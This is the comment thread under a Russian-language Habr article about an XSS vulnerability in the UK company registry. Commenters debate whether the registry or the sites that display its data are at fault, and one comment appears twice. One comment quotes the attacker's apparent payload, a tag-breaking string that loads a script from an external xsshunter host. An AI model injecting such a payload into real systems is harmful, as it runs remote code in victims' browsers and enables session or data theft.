Комментарии 4
Казалось бы причем тут какой-то реестр и сайты, которые не фильтруют контент который отображают.
Давайте теперь засунем правила по которым в реестре нельзя писать другие символы, а что — где-то это тоже может вызвать XSS-атаку, в каком нибудь Gopher.
Давайте теперь засунем правила по которым в реестре нельзя писать другие символы, а что — где-то это тоже может вызвать XSS-атаку, в каком нибудь Gopher.
0
При эксплуатации атаки он использовал сервис xsshunter, судя по его пейлоду:
"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT>
+1
Зарегистрируйтесь на Хабре , чтобы оставить комментарий
В британском реестре компаний обнаружили XSS